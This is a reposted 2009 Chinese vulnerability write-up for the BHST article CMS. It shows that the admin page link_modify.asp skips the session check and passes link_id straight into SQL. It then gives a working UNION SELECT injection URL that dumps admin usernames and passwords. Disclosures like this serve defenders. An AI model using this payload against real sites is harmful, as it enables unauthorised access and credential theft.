ARP联盟图文中心下载中心手机频道最近更新软件最近更新文章网络热点
您当前的位置→图文中心新闻资讯安全播报BHST文章系统漏洞
站内搜索:

BHST文章系统漏洞


2009/6/24  编辑:佚名 来源:本站整理 

参考消息:http://www.arpun.com/作者:Jshell
Blog:http://www.jshell.cn
发布于鸡拔毛IT潮人社区
http://www.jbmao.com
首先说下作者在程序中代码的顺序错误
<!--#include file="../conn.asp"-->
<%
if session("adminuser")="" then
  response.Redirect("login.asp")
end if
%>
<%@LANGUAGE="VBSCRIPT" CODEPAGE="936"%>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd";>
<html xmlns="http://www.w3.org/1999/xhtml";>
<%@LANGUAGE="VBSCRIPT" CODEPAGE="936"%>
这样一句好像是多此一举 而且位置放错了 程序使用的是vbscript 默认的
不要这句的 而且这句只能放在代码的最顶端吧
漏洞出现在 fis/login/link_modify.asp 里 看了下后台文件 大都有
session的验证 唯独这里没有 再看下代码:
<%
linkid=request("link_id")
if linkid<>"" then
set linkrs=server.CreateObject("adodb.recordset")
sqllink="select * from fis_links where link_id="& linkid
linkrs.open sqllink,conn,1,3
%>
典型的不能再典型的注入了 打开表 link_id 数了下一共6个字段 在页面上有
字段内容的rs输出 所以我们使用联合查询直接爆喽
http://127.0.0.1/fis/login/link_ ... 0union%20select%201,admin_name,admin_pass,4,5,6%20from%20fis_admin
如下图:
/article/UploadFiles/200906/20090624081059382.jpg
 

更多精彩,请查看本类栏目: 新闻资讯 - 安全播报
除非注明,ARP联盟文章来于网络,投稿原创等,转载请以链接形式标明本文地址。
本文地址:http://www.arpun.com/article/3836.html

相关文章
  • ·美国freewebhostingarea免费为您提供1500MPHP空间
  • ·BHST文章系统漏洞
  • 发表评论
    栏目列表
    阅读排行
    本类最新
    网站帮助 - 广告合作 - 下载声明 - 网站地图